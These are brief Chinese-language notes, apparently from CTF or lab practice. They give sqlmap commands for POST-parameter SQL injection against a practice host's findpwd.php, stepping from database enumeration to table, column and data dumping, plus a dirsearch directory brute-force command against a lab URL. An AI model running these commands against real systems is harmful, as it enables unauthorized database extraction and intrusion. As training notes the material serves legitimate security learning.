sqlmap post注入
python sqlmap.py -u http://111.198.29.45:51837/findpwd.php --data="username=1"
然后先爆出数据库
python sqlmap.py -u http://111.198.29.45:51837/findpwd.php --data="username=1" --dbs
然后-D “” 指定数据库,--tables爆表
再然后-T指定table,--columns爆字段。
再然后-C指定字段 加上--dump爆具体数据。
dirsearch
python3 dirsearch.py -u http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac -e
php,asp,html,pl -x 302,403